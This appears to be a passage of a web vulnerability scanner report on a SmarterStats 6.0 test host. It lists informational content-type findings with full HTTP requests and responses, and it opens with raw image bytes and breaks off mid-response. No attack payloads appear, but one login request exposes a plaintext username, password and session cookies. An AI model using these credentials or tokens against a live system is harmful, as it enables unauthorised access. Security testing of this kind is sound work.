.Y..z.......V..).f....'|Z.B.WX....C..@..<G...slQ.......W..B.y{jl...v...lVqnE...l..VB.P...G..Y._Q.........s.......>!..X..m......j...p....{.p7.....$..ob....n\.D...M!...0G......[.........8k...f.Y.&..c..l.! .. ...;.<.E.C.TtI.h....6..&.Kw.O..4Z .,.kj.;.... ..%E....... ...%P.Q...,....9^..O............4. v....K...=Rb.........@..k..[.....(..p...XS.h...Y.....fS...K4.;\..@.:U...KN#6...@@{..l.3E. .. .. .. .)..6Mq.2................LQ#..........hJ..MS....@..@..@...'...=S... .. .. .....`..'*............    @.i..5....M ..[.F......./..^k.M.....5?....e]F....F. .. ....l...ZA...%`.f..I..#......F.............M..s.H&..ZQQ'.....VL..F...^{M.B.\a../...
..Y....{......`....i `v...i...K..bo......8... .[..l...4..@..,....Y.Z..&"...V......6;....@..tJ..M...f...(n4!.
.EY|.f.[b...........W..A..@@.. .t:0h...@>.^...4.....D`'.M.<......N    @..t`.,......g...,.6..6gc....t.....)..6...... P....5%..5."....6....87K..ej.<......N    @..t`.,.............`.\..............`....y .. .. .. ...9.. .. .. ..:'.....B.@..@..@..@..s..@..@..@..tN..M....................................................4.n........IEND.B`.

10.59. http://vulnerable.smarterstats.6.0.host:9999/Temp/f8ef6da096584c109a8620d83d0d2462.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/f8ef6da096584c109a8620d83d0d2462.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/f8ef6da096584c109a8620d83d0d2462.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEDA3AB80"
Content-Type: image/jpeg
Content-Length: 8473
Connection: Close


10.60. http://vulnerable.smarterstats.6.0.host:9999/default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /default.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /default.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminSettings"}
Content-Length: 472

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24Split%24LP%24lnkUpdate&__EVENTTARGET=ctl00%24Split%24LP%24lnkUpdate&__EVENTARGUMENT=AdminSettings%7C%2FAdmin%2FfrmGeneralSettings.aspx&__VIEWSTATE=%2FwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGRZBpvqCZE5Qt1U3wUfSENqgqhOGAd2utwL918rT9feIA%3D%3D&ctl00%24Split%24LP%24SessionKey=17bab76dde4a45b8a2b4b99fa9615040&ctl00%24PageTitle=Sites&ctl00%24PanelLoadedState=%7B%7D&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:30 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 8999

1|#||4|5869|updatePanel|ctl00_Split_LP_StyledUpdatePanel1|
                   
<div class="PageTitle" id="SectionHeader">
   <div class="RoundedPageTitleLeft">
       <div class="RoundedPageTitleRight">
           <div id="SectionHeaderText" class="PageTitleText">
               Settings
           </div>
       </div>
   </div>
</div>
<div id="ButtonBar" class="ButtonBar">
   
<!-- HyperMenu -->
<div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_Split_LP_ctl01_menuSN' name='ctl00$Split$LP$ctl01$menuSN' style='z-index:800'>
   <li class='hmItem hmFirst hmLast' id='ctl00_Split_LP_ctl01_menuSN_menuGlobalNew' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>New<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuSN_menuGlobalNew_b7d0be11cb2e4d8580fc0da2775a920f' style='z-index: 800'><a class='hmA' href='#'>New Site</a></li>
       <li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuSN_menuGlobalNew_063c2211e3354b5080f77dacfc30e70c' style='z-index: 800'><a class='hmA' href='#'>New Server</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
</ul>
</div>
<div class='hmClear'><!-- --></div>

</div>
<div id="LeftScrollable" class="ContentDiv">
   
<!-- HyperTreeView -->
<div class='htvTree'><ul class='htvTree' id='ctl00_Split_LP_ctl01_treeNav'>
   <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv0' TTUID="NAVGeneralSettings" TTUID="treeGeneralSettings" >
       <div class='htvLineFirst'>
           <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/settings.gif' /><a class='htvA' href='#'>General Settings</a>
       </div>
   </li>
   <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1' TTUID="NAVEmailSettings" TTUID="treeEmailSettings" >
       <div class='htvLine'>
           <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/PopRetrieval.gif' /><a class='htvA' href='#'>Email Settings</a>
       </div>
   </li>
   <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv2' TTUID="NAVExtensionSettings" TTUID="treeExtensionSettings" >
       <div class='htvLine'>
           <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/TicketsInQueue.gif' /><a class='htvA' href='#'>Extension Settings</a>
       </div>
   </li>
   <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv3' TTUID="NAVReportSettings" TTUID="treeReportSettings" >
       <div class='htvLine'>
           <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/reports.gif' /><a class='htvA' href='#'>Report Settings</a>
       </div>
   </li>
   <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv4' TTUID="NAVDefaults" TTUID="treeDefaults" >
       <div class='htvLine'>
           <span class='htvToggle htvExpanded'></span>
           <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/folder.gif' /><a class='htvA' href='#'>Defaults</a>
       </div>
       <ul class='htvSub' style='display:block;'>
           <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv4_htv0' Requires="ENTERPRISE" TTUID="NAVDefaultsServerDefaults" TTUID="treeDefaultsServerDefaults" >
               <div class='htvLine'>
                   <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/domain.gif' /><a class='htvA' href='#'>Server Defaults</a>
               </div>
           </li>
           <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv4_htv1' Requires="ENTERPRISE" TTUID="NAVDefaultsServerPropagation" TTUID="treeDefaultsServerPropagation" >
               <div class='htvLine'>
                   <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/Propagation.gif' /><a class='htvA' href='#'>Server Propagation</a>
               </div>
           </li>
           <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv4_htv2' TTUID="NAVDefaultsSiteDefaults" TTUID="treeDefaultsSiteDefaults" >
               <div class='htvLine'>
                   <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/domain.gif' /><a class='htvA' href='#'>Site Defaults</a>
               </div>
           </li>
           <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv4_htv3' TTUID="NAVDefaultsSitePropagation" TTUID="treeDefaultsSitePropagation" >
               <div class='htvLineLast'>
                   <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/Propagation.gif' /><a class='htvA' href='#'>Site Propagation</a>
               </div>
           </li>
       </ul>
   </li>
   <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv5' TTUID="NAVActivation" TTUID="treeActivation" >
       <div class='htvLineLast'>
           <span class='htvToggle htvExpanded'></span>
           <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/folder.gif' /><a class='htvA' href='#'>Activation</a>
       </div>
       <ul class='htvSub' style='display:block;'>
           <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv5_htv0' TTUID="NAVActivationLicensing" TTUID="treeActivationLicensing" >
               <div class='htvLine'>
                   <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/private.gif' /><a class='htvA' href='#'>Licensing</a>
               </div>
           </li>
           <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv5_htv1' ClientSideCommand="GenericPopup&#x28;&#x22;&#x22;&#x2c;&#x20;&#x22;CheckupWindow&#x22;&#x2c;&#x20;&#x22;width&#x3d;700&#x2c;height&#x3d;850&#x2c;resizable&#x3d;no&#x2c;scrollbars&#x3d;yes&#x2c;status&#x3d;no&#x2c;toolbar&#x3d;no&#x22;&#x29;&#x3b;" TTUID="NAVActivationAdminDiagnostic" TTUID="treeActivationAdminDiagnostic" >
               <div class='htvLineLast'>
                   <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/Status_Diagnostic.gif' /><a class='htvA' href='#'>Self Diagnostic</a>
               </div>
           </li>
       </ul>
   </li>
</ul></div>

</div>
<div id="ctl00_Split_LP_ctl01_Footer" class="Footer">
</div>

|0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||124|hiddenField|__VIEWSTATE|/wEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGRZBpvqCZE5Qt1U3wUfSENqgqhOGAd2utwL918rT9feIA==|25|asyncPostBackControlIDs||ctl00$Split$LP$lnkUpdate,|0|postBackControlIDs|||35|updatePanelIDs||tctl00$Split$LP$StyledUpdatePanel1,|0|childUpdatePanelIDs|||34|panelsToRefreshIDs||ctl00$Split$LP$StyledUpdatePanel1,|2|asyncPostBackTimeout||90|12|formAction||default.aspx|5|pageTitle||Sites|90|scriptBlock|ScriptContentWithTags|{"text":"\r\n\t\tif (self.ResizeLeftBar) ResizeLeftBar();\r\n\t","type":"text/javascript"}|20|scriptStartupBlock|ScriptContentNoTags|ClearTreeToggle();
|20|scriptStartupBlock|ScriptContentNoTags|SidebarAjaxLoaded();|43|scriptStartupBlock|ScriptContentNoTags|if (self.LeftBarReady) self.LeftBarReady();|589|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_Split_LP_ctl01_menuSN').hyperMenu({"ClearFloat":true,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_Split_LP_ctl01_menuSN_menuGlobalNew":"return false;","ctl00_Split_LP_ctl01_menuSN_menuGlobalNew_b7d0be11cb2e4d8580fc0da2775a920f":"OpenNewMessage(\u0027/Admin/frmSite.aspx\u0027, 800, 600); return false;","ctl00_Split_LP_ctl01_menuSN_menuGlobalNew_063c2211e3354b5080f77dacfc30e70c":"OpenNewMessage(\u0027/Admin/frmServer.aspx\u0027, 600, 400); return false;"},"ClientCallbacks":{}}); });
|1426|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_Split_LP_ctl01_treeNav').hyperTreeView({"imagePath":"/App_Themes/Default/Images/16x16/","NoLines":false,"ContextMenuID":null,"FunctionMap":{"ctl00_Split_LP_ctl01_treeNav_htv0":"UpdateFrame(\u0027\\x2fAdmin\\x2ffrmGeneralSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1":"UpdateFrame(\u0027\\x2fAdmin\\x2ffrmEmailReportSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv2":"UpdateFrame(\u0027\\x2fAdmin\\x2ffrmExtensionSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv3":"UpdateFrame(\u0027\\x2fAdmin\\x2ffrmReportSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv4_htv0":"UpdateFrame(\u0027\\x2fAdmin\\x2fDefaults\\x2ffrmServerDefaults\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv4_htv1":"UpdateFrame(\u0027\\x2fAdmin\\x2fDefaults\\x2ffrmServerPropagation\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv4_htv2":"UpdateFrame(\u0027\\x2fAdmin\\x2fDefaults\\x2ffrmDefaultSiteSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv4_htv3":"UpdateFrame(\u0027\\x2fAdmin\\x2fDefaults\\x2ffrmSitePropagation\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv5_htv0":"UpdateFrame(\u0027\\x2fAdmin\\x2ffrmLicenseManager\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv5_htv1":"OpenDiagnostic(\u0027/Admin/frmSelfDiagnostic.aspx\u0027); return false;"},"ClientCallbacks":{"onExpand":"RecordTreeExpanded","onCollapse":"RecordTreeCollapsed"}}); });
|83|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_Split_LP_ctl01_treeNav_htv0').selectHyperTreeNode(); });
|

10.61. http://vulnerable.smarterstats.6.0.host:9999/login.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /login.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /login.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/login.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=
Content-Length: 921

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&__LASTFOCUS=&__EVENTTARGET=ctl00%24BPH%24LoginImageButton&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMjU1NDEwNjEyDxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYCAgUPZBYCZg9kFgYCAw9kFgICAQ8WAh4EVGV4dGVkAgUPZBYCAg0PEA8WAh8CBQtSZW1lbWJlciBtZWRkZGQCBw9kFgYCAQ8QZBAVAhRVc2UgQnJvd3NlciBMYW5ndWFnZQdFbmdsaXNoFQIAAmVuFCsDAmdnFgFmZAIDDw8WAh4LTmF2aWdhdGVVUkwFY2h0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPVUmdj02LjAuMzkzMiZsYW5nPWVuLVVTJnBhZ2U9TG9naW5BZG1pbmRkAgcPDxYCHghJbWFnZVVybAUGL3MuZ2lmZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFFmN0bDAwJE1QSCRjaGtBdXRvTG9naW4FF2N0bDAwJEJQSCRidG5FbnRlckNsaWNr6qvEQ8B%2F6RhNW2k59YbDX%2F7c%2BpglBMKB69UMRHLnBLI%3D&ctl00%24MPH%24txtSiteId=&ctl00%24MPH%24txtUserName=hoytnet&ctl00%24MPH%24txtPassword=LL12345&ctl00%24BPH%24LanguageList=&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:34:15 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Set-Cookie: SelectedLanguage=; expires=Sat, 10-Oct-2020 03:34:14 GMT; path=/
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 5845

1|#||4|3934|updatePanel|ctl00_UpdatePanel1|
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       <div class="TipTextFailure">Please enter your Site ID. The Site ID is the number assigned to the particular site you are trying to login to.</div>
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" value="hoytnet" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
   <option selected="selected" value="">Use Browser Language</option>
   <option value="en">English</option>

</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;U&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dU\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:1px;width:1px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               
           |0|hiddenField|__LASTFOCUS||0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||960|hiddenField|__VIEWSTATE|[ViewState value omitted]|0|asyncPostBackControlIDs|||0|postBackControlIDs|||20|updatePanelIDs||tctl00$UpdatePanel1,|0|childUpdatePanelIDs|||19|panelsToRefreshIDs||ctl00$UpdatePanel1,|2|asyncPostBackTimeout||90|10|formAction||login.aspx|33|pageTitle||SmarterStats Login - SmarterStats|251|scriptBlock|ScriptContentWithTags|{"text":"\r\n\t\t\t\t\t\t$(document).ready(function() {\r\n\t\t\t\t\t\t\t$(\u0027select\u0027).each(function() {\r\n\t\t\t\t\t\t\t\tif ($(this).width() \u003e 180) $(this).width(180);\r\n\t\t\t\t\t\t\t});\r\n\t\t\t\t\t\t}); ","type":"text/javascript"}|184|scriptBlock|ScriptPath|/ScriptResource.axd?d=J4GaAPvIQnKMlo_D4Qzm0xa_SfNPfhG-b75huVuGxjWeCTjnztP__eaRa_pbROzW4k2QpoHJQ-uBs4nJPYlOSUcDyDiDF_VzNI93UxMsc1qsbj8BlU_60tzY90-zez8Je4ZNE7PKenoQMyfzxRT0cg2&t=41e66e32|19|focus||ctl00_MPH_txtSiteId|

11. Content type is not specified
There are 14 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


11.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/frmDefaultSiteSettings.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/Defaults/frmDefaultSiteSettings.aspx

Request

POST /Admin/Defaults/frmDefaultSiteSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/frmDefaultSiteSettings.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"208759633","TopBarSection":"AdminSettings"}; ASP.NET_SessionId=goyfjk5bgnfdbekr0r35mk2c;
Content-Type: application/x-www-form-urlencoded
Content-Length: 20129

ctl00%24MPH%24txtDefaultDocuments_SettingText=%0d%0aindex.htm%0d%0aindex.html%0d%0adefault.asp%0d%0adefault.aspx&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&__EVENTTARGET=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&__EVENTARGUMENT=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=1&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24lstDefaultLogFileDays_SettingDropDown=1&ctl00%24MPH%24txtDefaultSmarterLogDirText_SettingText=C%3a%5cSmarterLogs%5c&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&__VIEWSTATE=[ViewState value omitted]&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24lstTimeZone_SettingDropDown=1&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:22:42 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:22:42 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47438
Connection: Close



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Site Defaults - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmDefaultSiteSettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="[ViewState value omitted]" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
